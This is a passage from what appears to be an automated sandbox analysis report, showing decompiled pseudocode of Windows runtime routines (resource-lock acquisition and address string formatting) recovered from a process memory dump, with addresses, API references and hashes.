                                                                                                                                                                                                          														continue;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                                          														return 1;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													goto L59;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												goto L40;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t106 =  *_t49;
                                                                                                                                                                                                          								__eflags = _t106;
                                                                                                                                                                                                          								if(__eflags > 0) {
                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                          										_t93 = _t106;
                                                                                                                                                                                                          										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                          										__eflags = _t93 - _t106;
                                                                                                                                                                                                          										if(_t93 == _t106) {
                                                                                                                                                                                                          											break;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t106 = _t93;
                                                                                                                                                                                                          										__eflags = _t93;
                                                                                                                                                                                                          										if(_t93 > 0) {
                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = _t106;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									goto L23;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L59;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t84 = _t115;
                                                                                                                                                                                                          					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                                                                          					__eflags = _t84 - _t115;
                                                                                                                                                                                                          					if(_t84 != _t115) {
                                                                                                                                                                                                          						_t115 = _t84;
                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L59:
                                                                                                                                                                                                          			}




































                                                                                                                                                                                                          0x0211236a
                                                                                                                                                                                                          0x0211236c
                                                                                                                                                                                                          0x02112371
                                                                                                                                                                                                          0x02112373
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02112379
                                                                                                                                                                                                          0x02112379
                                                                                                                                                                                                          0x0211237a
                                                                                                                                                                                                          0x0211237f
                                                                                                                                                                                                          0x0211237f
                                                                                                                                                                                                          0x02112385
                                                                                                                                                                                                          0x02112386
                                                                                                                                                                                                          0x02112389
                                                                                                                                                                                                          0x0211238e
                                                                                                                                                                                                          0x02112390
                                                                                                                                                                                                          0x020d5378
                                                                                                                                                                                                          0x020d537c
                                                                                                                                                                                                          0x02112396
                                                                                                                                                                                                          0x02112396
                                                                                                                                                                                                          0x02112397
                                                                                                                                                                                                          0x0211239c
                                                                                                                                                                                                          0x021123a2
                                                                                                                                                                                                          0x021123a3
                                                                                                                                                                                                          0x021123a6
                                                                                                                                                                                                          0x021123ab
                                                                                                                                                                                                          0x021123ad
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021123b3
                                                                                                                                                                                                          0x021123b3
                                                                                                                                                                                                          0x021123b4
                                                                                                                                                                                                          0x021123b9
                                                                                                                                                                                                          0x021123ba
                                                                                                                                                                                                          0x021123ba
                                                                                                                                                                                                          0x021123bc
                                                                                                                                                                                                          0x021123bf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02109153
                                                                                                                                                                                                          0x02109158
                                                                                                                                                                                                          0x0210915a
                                                                                                                                                                                                          0x0210915e
                                                                                                                                                                                                          0x02109160
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02109166
                                                                                                                                                                                                          0x02109166
                                                                                                                                                                                                          0x02109171
                                                                                                                                                                                                          0x02109176
                                                                                                                                                                                                          0x02109176
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02109160
                                                                                                                                                                                                          0x021123c6
                                                                                                                                                                                                          0x021123ce
                                                                                                                                                                                                          0x021123d7
                                                                                                                                                                                                          0x021123d7
                                                                                                                                                                                                          0x021123ad
                                                                                                                                                                                                          0x02112390
                                                                                                                                                                                                          0x02112373
                                                                                                                                                                                                          0x0211233f
                                                                                                                                                                                                          0x0211233f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211233f
                                                                                                                                                                                                          0x02112291
                                                                                                                                                                                                          0x02112291
                                                                                                                                                                                                          0x02112293
                                                                                                                                                                                                          0x02112295
                                                                                                                                                                                                          0x0211229a
                                                                                                                                                                                                          0x021122a1
                                                                                                                                                                                                          0x021122a3
                                                                                                                                                                                                          0x021122a7
                                                                                                                                                                                                          0x021122a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122ab
                                                                                                                                                                                                          0x021122ad
                                                                                                                                                                                                          0x021122af
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122af
                                                                                                                                                                                                          0x021122b1
                                                                                                                                                                                                          0x021122b4
                                                                                                                                                                                                          0x021122b4
                                                                                                                                                                                                          0x021122b6
                                                                                                                                                                                                          0x020d53be
                                                                                                                                                                                                          0x020d53be
                                                                                                                                                                                                          0x020d53be
                                                                                                                                                                                                          0x020d53c0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d53cb
                                                                                                                                                                                                          0x020d53ce
                                                                                                                                                                                                          0x020d53d0
                                                                                                                                                                                                          0x020d53d4
                                                                                                                                                                                                          0x020d53d6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d53d8
                                                                                                                                                                                                          0x020d53e3
                                                                                                                                                                                                          0x020d53ea
                                                                                                                                                                                                          0x020d53ea
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020d53d6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122b6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211228f
                                                                                                                                                                                                          0x02112349
                                                                                                                                                                                                          0x0211234d
                                                                                                                                                                                                          0x02112251
                                                                                                                                                                                                          0x02112251
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02112251
                                                                                                                                                                                                          0x021121a4
                                                                                                                                                                                                          0x021121a4
                                                                                                                                                                                                          0x021121a6
                                                                                                                                                                                                          0x021121a8
                                                                                                                                                                                                          0x021121ac
                                                                                                                                                                                                          0x021121b6
                                                                                                                                                                                                          0x021121b8
                                                                                                                                                                                                          0x021121bc
                                                                                                                                                                                                          0x021121be
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021121c0
                                                                                                                                                                                                          0x021121c2
                                                                                                                                                                                                          0x021121c4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02112206
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 885266447-4236105082
                                                                                                                                                                                                          • Opcode ID: 8dfa758eeaf8a03b1cd7b6d46286128d91becaffe0def891d61729d5792fee6d
                                                                                                                                                                                                          • Instruction ID: be7253778e1d9328c9c9b6a3b8262088db2d6b753e4f4cb0bcefcc8555bf9e65
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dfa758eeaf8a03b1cd7b6d46286128d91becaffe0def891d61729d5792fee6d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E15109717803216FEB25CA18CCC1FA673AAAF88724F214269ED55DF285DB71EC418B90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                          			E020F14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v10;
                                                                                                                                                                                                          				char _v140;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t24;
                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                                                          				signed int _t34;
                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                          				intOrPtr _t45;
                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                          				intOrPtr* _t52;
                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t51 = __edx;
                                                                                                                                                                                                          				_t24 =  *0x2192088; // 0x7750189a
                                                                                                                                                                                                          				_v8 = _t24 ^ _t57;
                                                                                                                                                                                                          				_t45 = _a16;
                                                                                                                                                                                                          				_t53 = _a4;
                                                                                                                                                                                                          				_t52 = _a20;
                                                                                                                                                                                                          				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                          					_t26 = 0xc000000d;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					if(_t45 == 0) {
                                                                                                                                                                                                          						if( *_t52 == _t45) {
                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                          						_t28 =  &_v140;
                                                                                                                                                                                                          						if(_a12 != 0) {
                                                                                                                                                                                                          							_push("[");
                                                                                                                                                                                                          							_push(0x41);
                                                                                                                                                                                                          							_push( &_v140);
                                                                                                                                                                                                          							_t29 = E020E7707();
                                                                                                                                                                                                          							_t58 = _t58 + 0xc;
                                                                                                                                                                                                          							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t54 = E020F13CB(_t53, _t28);
                                                                                                                                                                                                          						if(_a8 != 0) {
                                                                                                                                                                                                          							_t34 = E020E7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                                                                          							_t58 = _t58 + 0x10;
                                                                                                                                                                                                          							_t54 = _t54 + _t34 * 2;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_a12 != 0) {
                                                                                                                                                                                                          							_t40 = E020E7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                                                                          							_t58 = _t58 + 0x10;
                                                                                                                                                                                                          							_t54 = _t54 + _t40 * 2;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                                                                          						 *_t52 = _t53;
                                                                                                                                                                                                          						if( *_t52 < _t53) {
                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							E020B2340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                                                                          							_t26 = 0;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E020BE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                                                                          			}




















                                                                                                                                                                                                          0x020f1533
                                                                                                                                                                                                          0x020f14f3
                                                                                                                                                                                                          0x020f1559

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 0211EA22
                                                                                                                                                                                                            • Part of subcall function 020F13CB: ___swprintf_l.LIBCMT ref: 020F146B
                                                                                                                                                                                                            • Part of subcall function 020F13CB: ___swprintf_l.LIBCMT ref: 020F1490
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 020F156D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                                                                                          • Opcode ID: 6d41a792fb3e0979a8ee96fe47659895291898042c975c0657ffd23c2d0b19e1
                                                                                                                                                                                                          • Instruction ID: 540c9c4d2d3de464a6b1d186d4dd877d2f46c0818e5861d44fd8c801678c6718
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d41a792fb3e0979a8ee96fe47659895291898042c975c0657ffd23c2d0b19e1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E21C372940319EBDF61DE94CC41AEEB3ADAF10B04F444425EE4AE3140DB70AA589BE1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                                          			E020D53A5(signed int _a4, char _a8) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                          				signed int _t42;
                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                          				intOrPtr _t46;
                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                          				signed int _t64;
                                                                                                                                                                                                          				signed int _t71;
                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                          				intOrPtr _t78;
                                                                                                                                                                                                          				signed int* _t79;
                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                          				signed int _t92;
                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                          				void* _t105;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t64 = _a4;
                                                                                                                                                                                                          				_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                                          				_t71 = _t64 + 0x28;
                                                                                                                                                                                                          				_push(_t92);
                                                                                                                                                                                                          				if(_t32 < 0) {
                                                                                                                                                                                                          					_t78 =  *[fs:0x18];
                                                                                                                                                                                                          					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						__eflags = _t32 | 0xffffffff;
                                                                                                                                                                                                          						asm("lock xadd [ecx], eax");
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                          					_push(_t86);
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						L4:
                                                                                                                                                                                                          						__eflags = _t32;
                                                                                                                                                                                                          						if(_t32 == 0) {
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _a8;
                                                                                                                                                                                                          						if(_a8 == 0) {
                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                                          							_t79 = _t64 + 0x24;
                                                                                                                                                                                                          							_t71 = 1;
                                                                                                                                                                                                          							asm("lock xadd [eax], ecx");
                                                                                                                                                                                                          							_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                                          							_a4 = _t32;
                                                                                                                                                                                                          							__eflags = _t32;
                                                                                                                                                                                                          							if(_t32 != 0) {
                                                                                                                                                                                                          								L19:
                                                                                                                                                                                                          								_t86 = 0;
                                                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                          									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                                                                          									asm("sbb esi, esi");
                                                                                                                                                                                                          									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x021901c0;
                                                                                                                                                                                                          									_push(_t92);
                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                          									_t37 = E020AF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                                                                          									__eflags = _t37 - 0x102;
                                                                                                                                                                                                          									if(_t37 != 0x102) {
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t71 =  *(_t92 + 4);
                                                                                                                                                                                                          									_t85 =  *_t92;
                                                                                                                                                                                                          									_t51 = E020F4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                                                                          									_push(_t85);
                                                                                                                                                                                                          									_push(_t51);
                                                                                                                                                                                                          									E02103F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                                                                          									E02103F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                                                                          									_t86 = _t86 + 1;
                                                                                                                                                                                                          									_t105 = _t104 + 0x28;
                                                                                                                                                                                                          									__eflags = _t86 - 2;
                                                                                                                                                                                                          									if(__eflags > 0) {
                                                                                                                                                                                                          										E0213217A(_t71, __eflags, _t64);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                          									_push(0x65);
                                                                                                                                                                                                          									E02103F92();
                                                                                                                                                                                                          									_t104 = _t105 + 0xc;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t37;
                                                                                                                                                                                                          								if(__eflags < 0) {
                                                                                                                                                                                                          									_push(_t37);
                                                                                                                                                                                                          									E020F3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                                                                          									asm("int3");
                                                                                                                                                                                                          									_t40 =  *_t71;
                                                                                                                                                                                                          									 *_t71 = 0;
                                                                                                                                                                                                          									__eflags = _t40;
                                                                                                                                                                                                          									if(_t40 == 0) {
                                                                                                                                                                                                          										L1:
                                                                                                                                                                                                          										_t42 = E020D5384(_t92 + 0x24);
                                                                                                                                                                                                          										if(_t42 != 0) {
                                                                                                                                                                                                          											goto L31;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											goto L2;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                                                                          										_push( &_a4);
                                                                                                                                                                                                          										_push(_t40);
                                                                                                                                                                                                          										_t49 = E020AF970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                                                                          										__eflags = _t49;
                                                                                                                                                                                                          										if(__eflags >= 0) {
                                                                                                                                                                                                          											goto L1;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_push(_t49);
                                                                                                                                                                                                          											E020F3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                                                                          											L31:
                                                                                                                                                                                                          											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                                                          											_push( &_a4);
                                                                                                                                                                                                          											_push(1);
                                                                                                                                                                                                          											_t42 = E020AF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                                                          											__eflags = _t42;
                                                                                                                                                                                                          											if(__eflags >= 0) {
                                                                                                                                                                                                          												L2:
                                                                                                                                                                                                          												return _t42;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_push(_t42);
                                                                                                                                                                                                          												E020F3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                                                                          												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                                                          												_push( &_a4);
                                                                                                                                                                                                          												_push(1);
                                                                                                                                                                                                          												_t42 = E020AF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                                                          												__eflags = _t42;
                                                                                                                                                                                                          												if(__eflags >= 0) {
                                                                                                                                                                                                          													goto L2;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_push(_t42);
                                                                                                                                                                                                          													_t45 = E020F3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                                                                          													asm("int3");
                                                                                                                                                                                                          													while(1) {
                                                                                                                                                                                                          														_t74 = _t45;
                                                                                                                                                                                                          														__eflags = _t45 - 1;
                                                                                                                                                                                                          														if(_t45 != 1) {
                                                                                                                                                                                                          															break;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														_t86 = _t86 | 0xffffffff;
                                                                                                                                                                                                          														_t45 = _t74;
                                                                                                                                                                                                          														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                                                          														__eflags = _t45 - _t74;
                                                                                                                                                                                                          														if(_t45 != _t74) {
                                                                                                                                                                                                          															continue;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_t46 =  *[fs:0x18];
                                                                                                                                                                                                          															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                                                                          															return _t46;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L38;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													E020D5329(_t74, _t92);
                                                                                                                                                                                                          													_push(1);
                                                                                                                                                                                                          													_t48 = E020D53A5(_t92);
                                                                                                                                                                                                          													return _t48;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t71 =  *_t79;
                                                                                                                                                                                                          								__eflags = _t71;
                                                                                                                                                                                                          								if(__eflags > 0) {
                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                          										_t57 = _t71;
                                                                                                                                                                                                          										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                          										__eflags = _t57 - _t71;
                                                                                                                                                                                                          										if(_t57 == _t71) {
                                                                                                                                                                                                          											break;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t71 = _t57;
                                                                                                                                                                                                          										__eflags = _t57;
                                                                                                                                                                                                          										if(_t57 > 0) {
                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t32 = _a4;
                                                                                                                                                                                                          									__eflags = _t71;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									goto L19;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L38;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t71 = _t71 | 0xffffffff;
                                                                                                                                                                                                          					_t32 = 0;
                                                                                                                                                                                                          					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                          					if(0 != 0) {
                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L38:
                                                                                                                                                                                                          			}


























                                                                                                                                                                                                          0x0211228a
                                                                                                                                                                                                          0x0211228d
                                                                                                                                                                                                          0x0211228f
                                                                                                                                                                                                          0x021122bc
                                                                                                                                                                                                          0x021122bc
                                                                                                                                                                                                          0x021122bc
                                                                                                                                                                                                          0x021122be
                                                                                                                                                                                                          0x021122c4
                                                                                                                                                                                                          0x021122cc
                                                                                                                                                                                                          0x021122d0
                                                                                                                                                                                                          0x021122d6
                                                                                                                                                                                                          0x021122d7
                                                                                                                                                                                                          0x021122da
                                                                                                                                                                                                          0x021122df
                                                                                                                                                                                                          0x021122e4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122e6
                                                                                                                                                                                                          0x021122e9
                                                                                                                                                                                                          0x021122f4
                                                                                                                                                                                                          0x021122f9
                                                                                                                                                                                                          0x021122fa
                                                                                                                                                                                                          0x02112305
                                                                                                                                                                                                          0x02112314
                                                                                                                                                                                                          0x02112319
                                                                                                                                                                                                          0x0211231a
                                                                                                                                                                                                          0x0211231d
                                                                                                                                                                                                          0x02112320
                                                                                                                                                                                                          0x02112323
                                                                                                                                                                                                          0x02112323
                                                                                                                                                                                                          0x02112328
                                                                                                                                                                                                          0x0211232d
                                                                                                                                                                                                          0x0211232f
                                                                                                                                                                                                          0x02112331
                                                                                                                                                                                                          0x02112336
                                                                                                                                                                                                          0x02112336
                                                                                                                                                                                                          0x0211233b
                                                                                                                                                                                                          0x0211233d
                                                                                                                                                                                                          0x02112350
                                                                                                                                                                                                          0x02112351
                                                                                                                                                                                                          0x02112356
                                                                                                                                                                                                          0x02112359
                                                                                                                                                                                                          0x02112359
                                                                                                                                                                                                          0x0211235b
                                                                                                                                                                                                          0x0211235d
                                                                                                                                                                                                          0x020d5367
                                                                                                                                                                                                          0x020d536b
                                                                                                                                                                                                          0x020d5372
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02112363
                                                                                                                                                                                                          0x02112363
                                                                                                                                                                                                          0x02112369
                                                                                                                                                                                                          0x0211236a
                                                                                                                                                                                                          0x0211236c
                                                                                                                                                                                                          0x02112371
                                                                                                                                                                                                          0x02112373
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02112379
                                                                                                                                                                                                          0x02112379
                                                                                                                                                                                                          0x0211237a
                                                                                                                                                                                                          0x0211237f
                                                                                                                                                                                                          0x0211237f
                                                                                                                                                                                                          0x02112385
                                                                                                                                                                                                          0x02112386
                                                                                                                                                                                                          0x02112389
                                                                                                                                                                                                          0x0211238e
                                                                                                                                                                                                          0x02112390
                                                                                                                                                                                                          0x020d5378
                                                                                                                                                                                                          0x020d537c
                                                                                                                                                                                                          0x02112396
                                                                                                                                                                                                          0x02112396
                                                                                                                                                                                                          0x02112397
                                                                                                                                                                                                          0x0211239c
